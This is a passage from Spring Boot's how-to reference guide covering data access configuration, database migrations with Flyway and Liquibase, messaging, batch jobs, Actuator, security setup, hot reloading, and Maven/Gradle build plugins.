Boot. The other would have to be explicitly injected into a new instance. Alternatively,
you might be able to use a JTA transaction manager that spans both.

If you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,
as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Configuration
	@EnableJpaRepositories(basePackageClasses = Customer.class,
			entityManagerFactoryRef = "customerEntityManagerFactory")
	public class CustomerConfiguration {
		...
	}

	@Configuration
	@EnableJpaRepositories(basePackageClasses = Order.class,
			entityManagerFactoryRef = "orderEntityManagerFactory")
	public class OrderConfiguration {
		...
	}
----



[[howto-use-traditional-persistence-xml]]
=== Use a Traditional `persistence.xml` File
Spring Boot will not search for or use a `META-INF/persistence.xml` by default. If you
prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of
type `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the
persistence unit name there.

See
{sc-spring-boot-autoconfigure}/orm/jpa/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]
for the default settings.



[[howto-use-spring-data-jpa--and-mongo-repositories]]
=== Use Spring Data JPA and Mongo Repositories

Spring Data JPA and Spring Data Mongo can both automatically create `Repository`
implementations for you. If they are both present on the classpath, you might have to do
some extra configuration to tell Spring Boot which repositories to create. The most
explicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and
`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`
interfaces.

There are also flags (`+spring.data.*.repositories.enabled+` and
`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured
repositories on and off in external configuration. Doing so is useful, for instance, in
case you want to switch off the Mongo repositories and still use the auto-configured
`MongoTemplate`.

The same obstacle and the same features exist for other auto-configured Spring Data
repository types (Elasticsearch, Solr, and others).
To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to follow a single schema generation approach.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. 
This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent. An appropriate configuration is passed to the available JPA implementation\n(e.g. Hibernate).\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. 
Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. 
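For illustration, the following is a rough sketch of a Java-based callback bean, assuming
Flyway 5's `org.flywaydb.core.api.callback.Callback` API (the bean name and the handled
event are illustrative):

[source,java,indent=0]
----
	import org.flywaydb.core.api.callback.Callback;
	import org.flywaydb.core.api.callback.Context;
	import org.flywaydb.core.api.callback.Event;

	import org.springframework.stereotype.Component;

	@Component
	public class LoggingCallback implements Callback {

		@Override
		public boolean supports(Event event, Context context) {
			// Only react once all migrations have completed
			return event == Event.AFTER_MIGRATE;
		}

		@Override
		public boolean canHandleInTransaction(Event event, Context context) {
			return true;
		}

		@Override
		public void handle(Event event, Context context) {
			System.out.println("Database migration finished");
		}

	}
----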
Beans that implement the deprecated `FlywayCallback` interface can also be detected;
however, they cannot be used alongside `Callback` beans.

By default, Flyway autowires the (`@Primary`) `DataSource` in your context and
uses that for migrations. If you would like to use a different `DataSource`, you can create
one and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,
remember to create another one and mark it as `@Primary`. Alternatively, you can use
Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]`
in external properties. Setting either `spring.flyway.url` or `spring.flyway.user`
is sufficient to cause Flyway to use its own `DataSource`. If any of the three
properties has not been set, the value of its equivalent `spring.datasource` property is
used.

There is a {github-code}/spring-boot-samples/spring-boot-sample-flyway[Flyway sample] so
that you can see how to set things up.

You can also use Flyway to provide data for specific scenarios. For example, you can
place test-specific migrations in `src/test/resources` and they are run only when your
application starts for testing. Also, you can use profile-specific configuration to
customize `spring.flyway.locations` so that certain migrations run only when a particular
profile is active. For example, in `application-dev.properties`, you might specify the
following setting:

[source,properties,indent=0]
----
	spring.flyway.locations=classpath:/db/migration,classpath:/dev/db/migration
----

With that setup, migrations in `dev/db/migration` run only when the `dev` profile is
active.



[[howto-execute-liquibase-database-migrations-on-startup]]
==== Execute Liquibase Database Migrations on Startup
To automatically run Liquibase database migrations on startup, add
`org.liquibase:liquibase-core` to your classpath.

By default, the master change log is read from `db/changelog/db.changelog-master.yaml`,
but you can change the location by setting `spring.liquibase.change-log`. In addition to
YAML, Liquibase also supports JSON, XML, and SQL change log formats.

By default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses
that for migrations. If you need to use a different `DataSource`, you can create one and
mark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,
remember to create another one and mark it as `@Primary`. Alternatively, you can use
Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in
external properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`
is sufficient to cause Liquibase to use its own `DataSource`. If any of the three
properties has not been set, the value of its equivalent `spring.datasource` property is
used.

See
{sc-spring-boot-autoconfigure}/liquibase/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]
for details about available settings such as contexts, the default schema, and others.

There is a {github-code}/spring-boot-samples/spring-boot-sample-liquibase[Liquibase
sample] so that you can see how to set things up.
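As a point of reference, a minimal `db.changelog-master.yaml` might look like the
following sketch (the change set and table definition are illustrative):

[source,yaml,indent=0]
----
	databaseChangeLog:
	  - changeSet:
	      id: "1"
	      author: developer
	      changes:
	        - createTable:
	            tableName: customer
	            columns:
	              - column:
	                  name: id
	                  type: bigint
	                  constraints:
	                    primaryKey: true
----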
[[howto-messaging]]
== Messaging

Spring Boot offers a number of starters that include messaging. This section answers
questions that arise from using messaging with Spring Boot.

[[howto-jms-disable-transaction]]
=== Disable Transacted JMS Session
If your JMS broker does not support transacted sessions, you have to disable the
support of transactions altogether. If you create your own `JmsListenerContainerFactory`,
there is nothing to do, since, by default, it cannot be transacted. If you want to use
the `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you
can disable transacted sessions, as follows:

[source,java,indent=0]
----
	@Bean
	public DefaultJmsListenerContainerFactory jmsListenerContainerFactory(
			ConnectionFactory connectionFactory,
			DefaultJmsListenerContainerFactoryConfigurer configurer) {
		DefaultJmsListenerContainerFactory listenerFactory =
				new DefaultJmsListenerContainerFactory();
		configurer.configure(listenerFactory, connectionFactory);
		listenerFactory.setTransactionManager(null);
		listenerFactory.setSessionTransacted(false);
		return listenerFactory;
	}
----

The preceding example overrides the default factory, and it should be applied to any
other factory that your application defines, if any.



[[howto-batch-applications]]
== Batch Applications

This section answers questions that arise from using Spring Batch with Spring Boot.

NOTE: By default, batch applications require a `DataSource` to store job details. If you
want to deviate from that, you need to implement `BatchConfigurer`. See
{spring-batch-javadoc}/core/configuration/annotation/EnableBatchProcessing.html[The
Javadoc of `@EnableBatchProcessing`] for more details.

For more about Spring Batch, see the https://projects.spring.io/spring-batch/[Spring Batch
project page].



[[howto-execute-spring-batch-jobs-on-startup]]
=== Execute Spring Batch Jobs on Startup
Spring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`
(from Spring Batch) somewhere in your context.

By default, it executes *all* `Jobs` in the application context on startup (see
{sc-spring-boot-autoconfigure}/batch/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]
for details). You can narrow down to a specific job or jobs by specifying
`spring.batch.job.names` (which takes a comma-separated list of job name patterns).

[TIP]
.Specifying job parameters on the command line
====
Unlike command line option arguments that
<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties
in the `Environment`>> (i.e. by starting with `--`, such as
`--my-property=value`), job parameters have to be specified on the command line without
dashes (e.g. `jobParam=value`).
====

If the application context includes a `JobRegistry`, the jobs in
`spring.batch.job.names` are looked up in the registry instead of being autowired from the
context. This is a common pattern with more complex systems, where multiple jobs are
defined in child contexts and registered centrally.

See
{sc-spring-boot-autoconfigure}/batch/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]
and
https://github.com/spring-projects/spring-batch/blob/master/spring-batch-core/src/main/java/org/springframework/batch/core/configuration/annotation/EnableBatchProcessing.java[@EnableBatchProcessing]
for more details.
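For example, a minimal sketch that restricts startup execution to two jobs (the job names
are illustrative):

[source,properties,indent=0]
----
	spring.batch.job.names=importUserJob,reportingJob
----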
[[howto-actuator]]
== Actuator

Spring Boot includes the Spring Boot Actuator. This section answers questions that often
arise from its use.

[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]
=== Change the HTTP Port or Address of the Actuator Endpoints
In a standalone application, the Actuator HTTP port defaults to the same as the main HTTP
port. To make the application listen on a different port, set the external property
`management.server.port`. To listen on a completely different network address (such as
when you have an internal network for management and an external one for user
applications), you can also set `management.server.address` to a valid IP address to which
the server is able to bind.

For more detail, see the
{sc-spring-boot-actuator-autoconfigure}/web/server/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]
source code and
"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`"
in the "`Production-ready features`" section.



[[howto-customize-the-whitelabel-error-page]]
=== Customize the '`whitelabel`' Error Page
Spring Boot installs a '`whitelabel`' error page that you see in a browser client if
you encounter a server error (machine clients consuming JSON and other media types should
see a sensible response with the right error code).

NOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.
Doing so restores the default of the servlet container that you are using. Note that
Spring Boot still tries to resolve the error view, so you should probably add your own
error page rather than disabling it completely.

Overriding the error page with your own depends on the templating technology that you
use. For example, if you use Thymeleaf, you can add an `error.html` template.
If you use FreeMarker, you can add an `error.ftl` template. In general, you
need a `View` that resolves with a name of `error` or a `@Controller` that handles
the `/error` path. Unless you replaced some of the default configuration, you should find
a `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would
be a simple way of doing that. See
{sc-spring-boot-autoconfigure}/web/servlet/error/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]
for more options.

See also the section on "`<<boot-features-error-handling, Error Handling>>`" for details
of how to register handlers in the servlet container.



[[howto-sanitize-sensible-values]]
=== Sanitize Sensitive Values
Information returned by the `env` and `configprops` endpoints can be somewhat sensitive,
so keys matching certain patterns are sanitized by default (that is, their values are
replaced by `+******+`).

Spring Boot uses sensible defaults for such keys: for instance, any key ending with the
word "password", "secret", "key", or "token" is sanitized. It is also possible to use a
regular expression instead, such as `+*credentials.*+` to sanitize any key that holds the
word `credentials` as part of the key.

The patterns to use can be customized by using the
`management.endpoint.env.keys-to-sanitize` and
`management.endpoint.configprops.keys-to-sanitize` properties, respectively.
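For example, a minimal sketch (the pattern list shown is illustrative, not the default):

[source,properties,indent=0]
----
	management.endpoint.env.keys-to-sanitize=password,secret,token,.*credentials.*
----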
[[howto-security]]
== Security

This section addresses questions about security when working with Spring Boot, including
questions that arise from using Spring Security with Spring Boot.

For more about Spring Security, see the {spring-security}[Spring Security project page].



[[howto-switch-off-spring-boot-security-configuration]]
=== Switch off the Spring Boot Security Configuration
If you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,
it switches off the default webapp security settings in Spring Boot.



[[howto-change-the-user-details-service-and-add-user-accounts]]
=== Change the UserDetailsService and Add User Accounts
If you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,
or `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not
created, so you have the full feature set of Spring Security available (such as
https://docs.spring.io/spring-security/site/docs/current/reference/htmlsingle/#jc-authentication[various
authentication options]).

The easiest way to add user accounts is to provide your own `UserDetailsService` bean.



[[howto-enable-https]]
=== Enable HTTPS When Running behind a Proxy Server
Ensuring that all your main endpoints are only available over HTTPS is an important
chore for any application. If you use Tomcat as a servlet container, then
Spring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some
environment settings, and you should be able to rely on the `HttpServletRequest` to
report whether it is secure or not (even downstream of a proxy server that handles the
real SSL termination). The standard behavior is determined by the presence or absence of
certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are
conventional, so it should work with most front-end proxies. You can switch on the valve
by adding some entries to `application.properties`, as shown in the following example:

[source,properties,indent=0]
----
	server.tomcat.remote-ip-header=x-forwarded-for
	server.tomcat.protocol-header=x-forwarded-proto
----

(The presence of either of those properties switches on the valve. Alternatively, you can
add the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)

To configure Spring Security to require a secure channel for all (or some)
requests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following
`HttpSecurity` configuration:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Configuration
	public class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {

		@Override
		protected void configure(HttpSecurity http) throws Exception {
			// Customize the application security
			http.requiresChannel().anyRequest().requiresSecure();
		}

	}
----



[[howto-hotswapping]]
== Hot Swapping

Spring Boot supports hot swapping. This section answers questions about how it works.



[[howto-reload-static-content]]
=== Reload Static Content
There are several options for hot reloading.
The recommended approach is to use
<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides
additional development-time features, such as support for fast application restarts
and LiveReload, as well as sensible development-time configuration (such as template
caching). Devtools works by monitoring the classpath for changes. This means that static
resource changes must be "built" for the change to take effect. By default, this happens
automatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project
command triggers the necessary build. Due to the
<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart
exclusions>>, changes to static resources do not trigger a restart of your application.
They do, however, trigger a live reload.

Alternatively, running in an IDE (especially with debugging on) is a good way to do
development (all modern IDEs allow reloading of static resources and usually also allow
hot-swapping of Java class changes).

Finally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can
be configured (see the `addResources` property) to support running from the command line
with reloading of static files directly from source. You can use that with an external
css/js compiler process if you are writing that code with higher-level tools.



[[howto-reload-thymeleaf-template-content]]
=== Reload Templates without Restarting the Container
Most of the templating technologies supported by Spring Boot include a configuration
option to disable caching (described later in this document). If you use the
`spring-boot-devtools` module, these properties are
<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>
for you at development time.



[[howto-reload-thymeleaf-content]]
==== Thymeleaf Templates
If you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See
{sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]
for other Thymeleaf customization options.



[[howto-reload-freemarker-content]]
==== FreeMarker Templates
If you use FreeMarker, set `spring.freemarker.cache` to `false`. See
{sc-spring-boot-autoconfigure}/freemarker/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]
for other FreeMarker customization options.



[[howto-reload-groovy-template-content]]
==== Groovy Templates
If you use Groovy templates, set `spring.groovy.template.cache` to `false`. See
{sc-spring-boot-autoconfigure}/groovy/template/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]
for other Groovy customization options.



[[howto-reload-fast-restart]]
=== Fast Application Restarts
The `spring-boot-devtools` module includes support for automatic application restarts.
While not as fast as technologies such as
http://zeroturnaround.com/software/jrebel/[JRebel], it is usually significantly faster than
a "`cold start`".
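To try it with Maven, a minimal sketch adds the module as an optional dependency (assuming
dependency management from `spring-boot-starter-parent`):

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-devtools</artifactId>
		<optional>true</optional>
	</dependency>
----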
You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. 
Using this format lets the time be parsed into a `Date`, and its format, when serialized
to JSON, is then controlled by Jackson's date serialization configuration settings.



[[howto-customize-dependency-versions]]
=== Customize Dependency Versions
If you use a Maven build that inherits directly or indirectly from
`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to
override a specific third-party dependency, you can add appropriate `<properties>`
elements. Browse the
{github-code}/spring-boot-project/spring-boot-dependencies/pom.xml[`spring-boot-dependencies`]
POM for a complete list of properties. For example, to pick a different `slf4j` version,
you would add the following property:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<properties>
		<slf4j.version>1.7.5</slf4j.version>
	</properties>
----

NOTE: Doing so only works if your Maven project inherits (directly or indirectly) from
`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your
own `dependencyManagement` section with `<scope>import</scope>`, you have to redefine
the artifact yourself instead of overriding the property.

WARNING: Each Spring Boot release is designed and tested against this specific set of
third-party dependencies. Overriding versions may cause compatibility issues.

To override dependency versions in Gradle, see
{spring-boot-gradle-plugin-reference}/#managing-dependencies-customizing[this section]
of the Gradle plugin's documentation.

[[howto-create-an-executable-jar-with-maven]]
=== Create an Executable JAR with Maven
The `spring-boot-maven-plugin` can be used to create an executable "`fat`" JAR. If you
use the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are
repackaged as follows:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
----

If you do not use the parent POM, you can still use the plugin. However, you must
additionally add an `<executions>` section, as follows:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
				<version>{spring-boot-version}</version>
				<executions>
					<execution>
						<goals>
							<goal>repackage</goal>
						</goals>
					</execution>
				</executions>
			</plugin>
		</plugins>
	</build>
----

See the {spring-boot-maven-plugin-site}/usage.html[plugin documentation] for full usage
details.


[[howto-create-an-additional-executable-jar]]
=== Use a Spring Boot Application as a Dependency
Like a war file, a Spring Boot application is not intended to be used as a dependency. If
your application contains classes that you want to share with other projects, the
recommended approach is to move that code into a separate module. The separate module can
then be depended upon by your application and other projects.

If you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle
plugins must be configured to produce a separate artifact that is suitable for use as a
dependency.
The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the 